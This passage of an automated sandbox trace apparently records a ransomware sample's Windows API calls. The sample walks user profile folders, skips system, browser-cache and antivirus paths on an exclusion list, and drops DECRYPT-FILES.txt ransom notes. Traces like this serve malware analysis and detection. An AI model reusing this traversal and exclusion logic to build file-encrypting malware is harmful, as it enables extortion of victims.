nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0186.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.548] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.548] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.548] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.548] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec165d69, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0186.548] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.548] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0186.548] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0186.548] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0186.548] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dd3ec69, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="autorun.inf") returned 1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="boot.ini") returned 1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="desktop.ini") returned 1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat") returned -1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="iconcache.db") returned -1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="bootsect.bak") returned 1 [0186.548] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat.log") returned -1 [0186.549] lstrcmpiW (lpString1="Help.lnk", lpString2="thumbs.db") returned -1 [0186.549] lstrcmpiW (lpString1="Help.lnk", lpString2="Bootfont.bin") returned 1 [0186.549] lstrlenW (lpString="Help.lnk") returned 8 [0186.549] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.549] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dd3ec69, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 0 [0186.549] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0186.549] CloseHandle (hObject=0xffffffff) returned 0 [0186.549] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0186.549] lstrcmpW (lpString1="Startup", lpString2=".") returned 1 [0186.549] lstrcmpW (lpString1="Startup", lpString2="..") returned 1 [0186.549] lstrcatW (in: lpString1="Startup", lpString2="\\" | out: lpString1="Startup\\") returned="Startup\\" [0186.549] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Startup\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Program Files") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch=":\\Windows") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Games\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\All Users") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="AhnLab") returned 0x0 [0186.549] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.549] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 79 [0186.549] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.549] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\0a16c9.tmp") returned 90 [0186.549] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.550] GetLastError () returned 0x5 [0186.550] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 79 [0186.550] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.550] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt") returned 97 [0186.550] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.550] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 79 [0186.550] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0186.550] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0186.551] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.551] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.551] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.551] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.551] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.551] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.551] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.551] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.551] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.551] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.551] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.551] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.551] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0186.551] CloseHandle (hObject=0xffffffff) returned 0 [0186.551] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup\\", cAlternateFileName="")) returned 0 [0186.551] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.551] CloseHandle (hObject=0xffffffff) returned 0 [0186.551] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs\\", cAlternateFileName="")) returned 0 [0186.551] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.551] CloseHandle (hObject=0xffffffff) returned 0 [0186.551] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0186.551] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0186.551] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0186.551] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0186.552] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\All Users") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="AhnLab") returned 0x0 [0186.552] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.552] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 61 [0186.552] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.552] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\0a16c9.tmp") returned 72 [0186.552] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\templates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.552] GetLastError () returned 0x5 [0186.552] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 61 [0186.552] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.552] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt") returned 79 [0186.552] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.552] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 61 [0186.552] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0186.552] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.553] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.553] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.553] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.553] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.553] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0d14f80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.553] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.553] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0d14f80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.553] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.553] CloseHandle (hObject=0xffffffff) returned 0 [0186.553] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0186.553] lstrcmpW (lpString1="Themes", lpString2=".") returned 1 [0186.553] lstrcmpW (lpString1="Themes", lpString2="..") returned 1 [0186.553] lstrcatW (in: lpString1="Themes", lpString2="\\" | out: lpString1="Themes\\") returned="Themes\\" [0186.553] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Themes\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Program Files") returned 0x0 [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch=":\\Windows") returned 0x0 [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Games\\") returned 0x0 [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.553] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.554] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\All Users") returned 0x0 [0186.554] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.554] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.554] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.554] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="AhnLab") returned 0x0 [0186.554] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.554] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 58 [0186.554] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.554] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\0a16c9.tmp") returned 69 [0186.554] CreateFileW 